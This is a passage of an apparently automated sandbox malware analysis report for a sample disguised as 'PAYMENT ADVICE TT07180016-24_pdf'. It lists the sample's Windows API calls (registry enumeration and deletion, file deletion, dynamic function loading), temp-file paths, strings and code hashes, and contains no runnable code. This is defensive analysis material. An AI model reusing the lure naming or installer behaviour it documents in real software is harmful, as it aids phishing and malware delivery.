                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
                                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                                    • String ID: f
                                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                                    • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                                    • Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
                                                                                                                                    • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                                    • Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4
                                                                                                                                    APIs
                                                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                                                    • MulDiv.KERNEL32(000731A9,00000064,000731AD), ref: 00402D4D
                                                                                                                                    • wsprintfW.USER32 ref: 00402D5D
                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                                                    Strings
                                                                                                                                    • verifying installer: %d%%, xrefs: 00402D57
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                    • String ID: verifying installer: %d%%
                                                                                                                                    • API String ID: 1451636040-82062127
                                                                                                                                    • Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                                                    • Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
                                                                                                                                    • Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                                                    • Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58
                                                                                                                                    APIs
                                                                                                                                    • GetDC.USER32(?), ref: 00401D59
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                                                    • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                                                    • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                    • String ID: Calibri
                                                                                                                                    • API String ID: 3808545654-1409258342
                                                                                                                                    • Opcode ID: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
                                                                                                                                    • Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
                                                                                                                                    • Opcode Fuzzy Hash: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
                                                                                                                                    • Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 10002572
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2036183059.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2036170525.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2036195897.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2036208769.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$Free$Alloc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1780285237-0
                                                                                                                                    • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                                                    • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                                                                                                    • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                                                    • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                                                                                                    APIs
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2667972263-0
                                                                                                                                    • Opcode ID: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
                                                                                                                                    • Instruction ID: bba7bc1bbfa323a43f965ccea5c6d76089a10f976336bb633e0bf1cd6394a54a
                                                                                                                                    • Opcode Fuzzy Hash: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
                                                                                                                                    • Instruction Fuzzy Hash: E1219E72800114BBDF216FA5CE49D9E7EB9EF09324F24023AF550762E1C7795E41DBA8
                                                                                                                                    APIs
                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsxC748.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsxC748.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
                                                                                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsxC748.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsxC748.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsxC748.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharMultiWidelstrlen
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsxC748.tmp$C:\Users\user\AppData\Local\Temp\nsxC748.tmp\System.dll
                                                                                                                                    • API String ID: 3109718747-2886521359
                                                                                                                                    • Opcode ID: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
                                                                                                                                    • Instruction ID: 733a5b8a3421de7103486a8e2fd1e7248c9e7ae9f3a69bb90da27b1d5488d101
                                                                                                                                    • Opcode Fuzzy Hash: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
                                                                                                                                    • Instruction Fuzzy Hash: E011EB71A01205BBDB10AF718F49A9F3265DF44754F24403BF501F61C2EAFC9D91566D
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2036183059.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2036170525.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2036195897.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2036208769.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeGlobal
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2979337801-0
                                                                                                                                    • Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                                                    • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                                                                                                    • Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                                                    • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                                                                                                    APIs
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close$DeleteEnumOpen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1912718029-0
                                                                                                                                    • Opcode ID: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                                    • Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
                                                                                                                                    • Opcode Fuzzy Hash: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                                    • Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28
                                                                                                                                    APIs
                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                                                    • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2036183059.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2036170525.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2036195897.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2036208769.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1148316912-0
                                                                                                                                    • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                    • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                                                    • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                    • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1849352358-0
                                                                                                                                    • Opcode ID: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
                                                                                                                                    • Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
                                                                                                                                    • Opcode Fuzzy Hash: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
                                                                                                                                    • Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38
                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                                    • wsprintfW.USER32 ref: 00404A1A
                                                                                                                                    • SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                                    • String ID: %u.%u%s%s
                                                                                                                                    • API String ID: 3540041739-3551169577
                                                                                                                                    • Opcode ID: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
                                                                                                                                    • Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
                                                                                                                                    • Opcode Fuzzy Hash: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
                                                                                                                                    • Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8
                                                                                                                                    APIs
                                                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                                    • String ID: !
                                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                                    • Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                                                    • Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
                                                                                                                                    • Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                                                    • Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68
                                                                                                                                    APIs
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F4C
                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F6D
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F90
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                    • String ID: Call
                                                                                                                                    • API String ID: 3677997916-1824292864
                                                                                                                                    • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                                                    • Instruction ID: 7b18913d2a4f7d1a63d21b64be8b0843a819b9ea39c2317e7442ba644687e02f
                                                                                                                                    • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                                                    • Instruction Fuzzy Hash: 1801483110060AAECB218F66ED08EAB3BA8EF94350F01402AFD44D2260D734D964CBA5
                                                                                                                                    APIs
